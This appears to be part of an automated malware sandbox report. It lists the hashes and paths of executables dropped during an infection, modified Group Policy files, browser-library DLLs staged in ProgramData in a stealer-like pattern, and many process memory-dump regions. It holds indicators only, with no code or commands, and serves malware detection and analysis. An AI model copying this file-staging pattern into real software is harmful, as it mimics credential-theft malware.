SHA512e7f24919340e4d560b0e685acbcc997168cebe987ac514f2c2b3b7c2e4857ce8140b059a176bd2cb8c3a08eb0906d61f17aad3223828308c75ff631e7124b95e
-
C:\Users\Admin\Documents\SimpleAdobe\k95rDX7JIz32ZT4MP0qAMnnd.exeFilesize
10.9MB
MD5d43ac79abe604caffefe6313617079a3
SHA1b3587d3fa524761b207f812e11dd807062892335
SHA2568b750884259dd004300a84505be782d05fca2e487a66484765a4a1e357b7c399
SHA512bb22c73ed01ff97b73feb68ae2611b70ef002d1829035f58a4ba84c5a217db368aae8bdc02cdec59c1121922a207c662aa5f0a93377537da42657dd787587082
-
C:\Users\Admin\Documents\SimpleAdobe\o0knUSxzudR3Tq9UfOSc18rp.exeFilesize
2.5MB
MD5fffa9f082ea374f080b8b6c0ecd1f783
SHA1ba96219c03ed491d72ad39c012c4a08b99b008a2
SHA256b32a0ffce29ba355413cda01c14d26c0c806dfad1d82f81de95aca62119bfb03
SHA51286268dec5867cfe6472f06d0af3e64bb1a285de125f9ac0f92b715da38c00c2ebe63068cad08c974ff109fc95fafae065a2af606dff1f9c8c40b0405a3dbb0d1
-
C:\Users\Admin\Documents\SimpleAdobe\oqPrqcF_p51Ikj_siE3FraAu.exeFilesize
402KB
MD50a3032f2d890486035f79bb267f839f8
SHA120e40cb329a8e3ebc36952d26b0757dc10f3238c
SHA256dd1122ed752a7113fb83b5bdcb1959b2775e85e990c01a4ef38bd3113d5dddf4
SHA5124d3e006b8ab6df273dd1c190fe972aebc8efb527191beee9d266b6f38ad75bfa3275fcfd19b457e5584e3d896f9e81dc429f18b303c681f3cf3cbdd9a3f23638
-
C:\Users\Admin\Documents\SimpleAdobe\oqPrqcF_p51Ikj_siE3FraAu.exeFilesize
402KB
MD56b0ed984f58e5bf958aa797ca37b2770
SHA14cf2f8ffea5c4edb12a6276ab32b1070ee68b0aa
SHA2565f2104232bfacfbad61fc2f509758069cbeab12f5082f7927659ddbccbcce828
SHA5124a9ba5d98da78d66d166ce84e27e9917164f877215d07567c6133c1f8bbab27e0ca7637ab5fe9102edd9c673c2e580b8e84da6e2d3e1d6751ddc3f3ff5a53e55
-
C:\Users\Admin\Documents\SimpleAdobe\p17iTJJwQM2SJYHoGcTftXlW.exeFilesize
814KB
MD5f7ffa7c067ff7d581df1ad9ee8466ce4
SHA18eac738971ffdad645470d0e775d7fbb8d8a0cd1
SHA256c7c9e9d1f2d52fa4b6a523f0143dc6b5b93937d0f1890b5d10c8f0fd68298232
SHA512120123fb551ea7f4b8a8f6f4779bef061321325a55f3e9fafcbceefb1a902899ba8939458d48e35a54cde9c2511ca3c5a17856d3afd71ad9133a19cabda2acbd
-
C:\Users\Admin\Documents\SimpleAdobe\p17iTJJwQM2SJYHoGcTftXlW.exeFilesize
814KB
MD57265daee89e587ef7bfae3359391c6de
SHA1918a6401d39ddcea8a9f34c37715deddf0e206ee
SHA2564f9af410240401ada8d2eee48baf81dd7c33e990d7927fa1d456533cbfb37c6e
SHA512b568c459eea4df96d0ca6f6e15f88c8267aa8a2ed4646e5704f3c14217ed8609106b87b9534d1a56b775af45592d92f41f935712e7808f4e3aea201e17fcc18a
-
C:\Users\Admin\Documents\SimpleAdobe\uYkMa32B1u91LLN7h5L3nf9F.exeFilesize
2.8MB
MD5a11f04965873fb811528655bcd0d6cd0
SHA17553d76b805ed0e55a85c98be82800fa7e2412c7
SHA256fadd2121c7c16c8399bca5496b4337630012b5c9eb2f14bccf9e426ba9fec20d
SHA5127d4659f86fc4fb330f6431383449987d891f6b17091125b0e895bc026b6bfabbc037308c9df241d860cb4cc27c0528ad25606d5b85c50df41818fc6c89987aa5
-
C:\Users\Admin\Documents\SimpleAdobe\uYkMa32B1u91LLN7h5L3nf9F.exeFilesize
2.8MB
MD564e769e16f853835dd768a9b65626407
SHA187c0e29f2335809e3e70aaee47187db3ee8ceece
SHA2565ece0d233ac404577a0ae14c8195299d239e4bbf3cb004b56cdeddf77de94733
SHA512f275730523bbf75d6f96bef1255be756fd84ae570d0d5aae7f29a513da15b2d7f9b1b057912accb15be5de27e80067b2e83a07b4e78968cb412c2f0ffdd35879
-
C:\Users\Admin\Documents\SimpleAdobe\zhrbwIHyj0mG5eqgBTMDpJrS.exeFilesize
344KB
MD5a4887157e6a13b405a4b163905ad89f7
SHA161a8045d39c9b8e86df804a677bed7274da0a1cf
SHA256784f1ebccee3357cc7a6b67b6f46376185df75e47ee0d387c48ddd7090feb97e
SHA51255ac9cd91581e82ce7172540b29e19ebc6968d79bbab772661c1ef33fb79884d2281d25641ba35b58f250a2aa919f5fdeb61818e16f23ce3682e17f277f8367f
-
C:\Users\Admin\Pictures\7vSO6SdPDPBAoQSD68vaArP1.exeFilesize
7KB
MD577f762f953163d7639dff697104e1470
SHA1ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499
-
C:\Windows\System32\GroupPolicy\GPT.INIFilesize
127B
MD57cc972a3480ca0a4792dc3379a763572
SHA1f72eb4124d24f06678052706c542340422307317
SHA25602ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7
-
C:\Windows\System32\GroupPolicy\Machine\Registry.polFilesize
1KB
MD5cdfd60e717a44c2349b553e011958b85
SHA1431136102a6fb52a00e416964d4c27089155f73b
SHA2560ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8
-
C:\Windows\System32\GroupPolicy\gpt.iniFilesize
306B
MD57534b5b74212cb95b819401235bd116c
SHA1787ad181b22e161330aab804de4abffbfc0683b0
SHA256b05c6723077813dc9b48a2f1142db37ea63c672931d13a74d320f7d006756a04
SHA512ea268788dc59ab78c0aadd4db9bbcf95493bf4eb2b5ae3d592e6876596246832fc574e7bc1348ce7922b32dcedcf71876ff59fb8beace5c06891ec897c9dac51
-
\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
\Users\Admin\AppData\Local\Temp\is-KOJOP.tmp\_isetup\_iscrypt.dllFilesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
memory/312-733-0x0000000008FA0000-0x0000000009016000-memory.dmpFilesize
472KB
-
memory/312-737-0x00000000080D0000-0x00000000080EE000-memory.dmpFilesize
120KB
-
memory/312-622-0x0000000000400000-0x00000000004CC000-memory.dmpFilesize
816KB
-
memory/312-749-0x000000000A0F0000-0x000000000A61C000-memory.dmpFilesize
5.2MB
-
memory/312-723-0x0000000008660000-0x00000000086C6000-memory.dmpFilesize
408KB
-
memory/312-747-0x00000000099F0000-0x0000000009BB2000-memory.dmpFilesize
1.8MB
-
memory/396-318-0x0000000005990000-0x0000000005BE6000-memory.dmpFilesize
2.3MB
-
memory/396-275-0x0000000000B60000-0x0000000000F16000-memory.dmpFilesize
3.7MB
-
memory/396-456-0x0000000006D20000-0x0000000006F48000-memory.dmpFilesize
2.2MB
-
memory/684-634-0x00000000051D0000-0x00000000051E2000-memory.dmpFilesize
72KB
-
memory/684-606-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/684-642-0x0000000005290000-0x00000000052DB000-memory.dmpFilesize
300KB
-
memory/684-623-0x0000000005EB0000-0x00000000064B6000-memory.dmpFilesize
6.0MB
-
memory/684-620-0x0000000004E80000-0x0000000004E8A000-memory.dmpFilesize
40KB
-
memory/684-607-0x00000000053A0000-0x000000000589E000-memory.dmpFilesize
5.0MB
-
memory/684-608-0x0000000004EA0000-0x0000000004F32000-memory.dmpFilesize
584KB
-
memory/684-635-0x0000000005250000-0x000000000528E000-memory.dmpFilesize
248KB
-
memory/684-755-0x0000000006950000-0x00000000069A0000-memory.dmpFilesize
320KB
-
memory/684-633-0x00000000058A0000-0x00000000059AA000-memory.dmpFilesize
1.0MB
-
memory/824-0-0x00007FF7679D0000-0x00007FF7689EC000-memory.dmpFilesize
16.1MB
-
memory/988-770-0x0000000009660000-0x00000000096F4000-memory.dmpFilesize
592KB
-
memory/988-745-0x0000000004D00000-0x0000000004D36000-memory.dmpFilesize
216KB
-
memory/988-772-0x0000000009700000-0x0000000009722000-memory.dmpFilesize
136KB
-
memory/988-748-0x00000000077E0000-0x0000000007E08000-memory.dmpFilesize
6.2MB
-
memory/988-771-0x0000000009610000-0x000000000962A000-memory.dmpFilesize
104KB
-
memory/988-751-0x0000000008000000-0x0000000008066000-memory.dmpFilesize
408KB
-
memory/988-750-0x0000000007E60000-0x0000000007E82000-memory.dmpFilesize
136KB
-
memory/988-752-0x00000000080E0000-0x0000000008430000-memory.dmpFilesize
3.3MB
-
memory/988-753-0x0000000007FB0000-0x0000000007FCC000-memory.dmpFilesize
112KB
-
memory/1080-1835-0x00000000010D0000-0x0000000001593000-memory.dmpFilesize
4.8MB
-
memory/1080-1135-0x00000000010D0000-0x0000000001593000-memory.dmpFilesize
4.8MB
-
memory/1916-1153-0x00000000069D0000-0x0000000006D20000-memory.dmpFilesize
3.3MB
-
memory/1916-1154-0x0000000006E00000-0x0000000006E4B000-memory.dmpFilesize
300KB
-
memory/1920-268-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2832-647-0x0000000000400000-0x0000000000742000-memory.dmpFilesize
3.3MB
-
memory/3000-1032-0x00000000066C0000-0x000000000670B000-memory.dmpFilesize
300KB
-
memory/3000-1031-0x0000000006150000-0x00000000064A0000-memory.dmpFilesize
3.3MB
-
memory/3064-317-0x0000000000FD0000-0x0000000000FD1000-memory.dmpFilesize
4KB
-
memory/3064-293-0x0000000000FD0000-0x0000000000FD1000-memory.dmpFilesize
4KB
-
memory/3304-1819-0x0000021199E40000-0x0000021199E46000-memory.dmpFilesize
24KB
-
memory/3304-1820-0x00000211B4C90000-0x00000211B4CEC000-memory.dmpFilesize
368KB
-
memory/3304-1798-0x0000021199A40000-0x0000021199A4A000-memory.dmpFilesize
40KB
-
memory/3632-1824-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/3712-273-0x0000000000280000-0x0000000000DCC000-memory.dmpFilesize
11.3MB
-
memory/3712-1139-0x0000000000280000-0x0000000000DCC000-memory.dmpFilesize
11.3MB
-
memory/3712-1108-0x0000000000280000-0x0000000000DCC000-memory.dmpFilesize
11.3MB
-
memory/3904-281-0x0000000004F90000-0x000000000510A000-memory.dmpFilesize
1.5MB
-
memory/3904-295-0x0000000005110000-0x0000000005270000-memory.dmpFilesize
1.4MB
-
memory/3904-274-0x0000000000360000-0x0000000000626000-memory.dmpFilesize
2.8MB
-
memory/4156-1640-0x0000000000D40000-0x00000000011F5000-memory.dmpFilesize
4.7MB
-
memory/4156-316-0x0000000000400000-0x0000000000649000-memory.dmpFilesize
2.3MB
-
memory/4156-320-0x0000000000400000-0x0000000000649000-memory.dmpFilesize
2.3MB
-
memory/4156-1667-0x0000000000D40000-0x00000000011F5000-memory.dmpFilesize
4.7MB
-
memory/4232-357-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-351-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-279-0x0000000004F20000-0x0000000004FBC000-memory.dmpFilesize
624KB
-
memory/4232-263-0x0000000000400000-0x0000000000684000-memory.dmpFilesize
2.5MB
-
memory/4232-294-0x0000000004FF0000-0x00000000050F0000-memory.dmpFilesize
1024KB
-
memory/4232-381-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-380-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-377-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-375-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-373-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-371-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-369-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-367-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-365-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-363-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-305-0x00000000050F0000-0x00000000051D6000-memory.dmpFilesize
920KB
-
memory/4232-361-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-359-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-319-0x0000000004E30000-0x0000000004E4C000-memory.dmpFilesize
112KB
-
memory/4232-330-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-355-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-353-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-349-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-347-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-345-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-331-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-343-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-333-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-341-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-335-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-337-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4232-339-0x0000000004E30000-0x0000000004E45000-memory.dmpFilesize
84KB
-
memory/4316-276-0x00000000009D0000-0x0000000000D86000-memory.dmpFilesize
3.7MB
-
memory/4316-329-0x0000000006B60000-0x0000000006D86000-memory.dmpFilesize
2.1MB
-
memory/4316-304-0x00000000057E0000-0x0000000005A34000-memory.dmpFilesize
2.3MB
-
memory/4412-1192-0x0000000000400000-0x0000000000742000-memory.dmpFilesize
3.3MB
-
memory/4412-656-0x0000000000400000-0x0000000000742000-memory.dmpFilesize
3.3MB
-
memory/4592-868-0x0000000007F80000-0x0000000007FCB000-memory.dmpFilesize
300KB
-
memory/4592-867-0x00000000074E0000-0x0000000007830000-memory.dmpFilesize
3.3MB
-
memory/5392-1071-0x0000000000B30000-0x0000000001121000-memory.dmpFilesize
5.9MB
-
memory/5392-1619-0x0000000000B30000-0x0000000001121000-memory.dmpFilesize
5.9MB
-
memory/5512-2057-0x0000000004270000-0x0000000004276000-memory.dmpFilesize
24KB
-
memory/5512-2143-0x0000000007740000-0x000000000775A000-memory.dmpFilesize
104KB
-
memory/5512-1900-0x0000000000CC0000-0x0000000000D2A000-memory.dmpFilesize
424KB
-
memory/5512-2048-0x0000000007330000-0x00000000075F2000-memory.dmpFilesize
2.8MB
-
memory/5512-2152-0x0000000007760000-0x0000000007766000-memory.dmpFilesize
24KB
-
memory/5584-1637-0x00000000010B0000-0x0000000001565000-memory.dmpFilesize
4.7MB
-
memory/5584-1626-0x00000000010B0000-0x0000000001565000-memory.dmpFilesize
4.7MB
-
memory/5816-1110-0x0000000006CC0000-0x0000000006D0B000-memory.dmpFilesize
300KB
-
memory/5816-1574-0x00000000010D0000-0x0000000001593000-memory.dmpFilesize
4.8MB
-
memory/5948-1137-0x0000000000ED0000-0x0000000001393000-memory.dmpFilesize
4.8MB
-
memory/5948-1109-0x0000000000ED0000-0x0000000001393000-memory.dmpFilesize
4.8MB
-
memory/6000-1636-0x0000000000D40000-0x00000000011F5000-memory.dmpFilesize
4.7MB
-
memory/6000-3879-0x0000000000D40000-0x00000000011F5000-memory.dmpFilesize
4.7MB
-
memory/6116-1641-0x00000000010D0000-0x0000000001593000-memory.dmpFilesize
4.8MB
-
memory/6116-1669-0x00000000010D0000-0x0000000001593000-memory.dmpFilesize
4.8MB
-
memory/6236-1652-0x00000000013A0000-0x0000000001991000-memory.dmpFilesize
5.9MB
-
memory/6480-1673-0x0000000000400000-0x0000000000592000-memory.dmpFilesize
1.6MB
-
memory/6596-1688-0x0000000000340000-0x0000000000392000-memory.dmpFilesize
328KB
-
memory/6596-1743-0x00000000063F0000-0x000000000643B000-memory.dmpFilesize
300KB
-
memory/6632-2110-0x00000000067E0000-0x0000000006B30000-memory.dmpFilesize
3.3MB
-
memory/6640-1724-0x00000000006B0000-0x000000000071C000-memory.dmpFilesize
432KB
-
memory/6700-1707-0x0000000000F90000-0x0000000000FE2000-memory.dmpFilesize
328KB
-
memory/7100-2025-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/7164-1931-0x000001A291750000-0x000001A29175A000-memory.dmpFilesize
40KB
-
memory/7164-2015-0x000001A2AC980000-0x000001A2AC9E8000-memory.dmpFilesize
416KB
-
memory/7308-2219-0x0000000009E80000-0x000000000A4F8000-memory.dmpFilesize
6.5MB
-
memory/7308-2202-0x0000000008520000-0x000000000856B000-memory.dmpFilesize
300KB
-
memory/7444-2216-0x0000000005E70000-0x0000000005E8E000-memory.dmpFilesize
120KB
-
memory/7444-2215-0x0000000006040000-0x000000000614A000-memory.dmpFilesize
1.0MB
-
memory/7444-2191-0x0000000000400000-0x0000000000642000-memory.dmpFilesize
2.3MB
-
memory/7936-2253-0x00000000050F0000-0x000000000515E000-memory.dmpFilesize
440KB
-
memory/7936-2252-0x0000000002A10000-0x0000000002A80000-memory.dmpFilesize
448KB
-
memory/10216-3960-0x00000257656D0000-0x00000257656F2000-memory.dmpFilesize
136KB
-
memory/10216-4051-0x0000025766220000-0x0000025766296000-memory.dmpFilesize
472KB
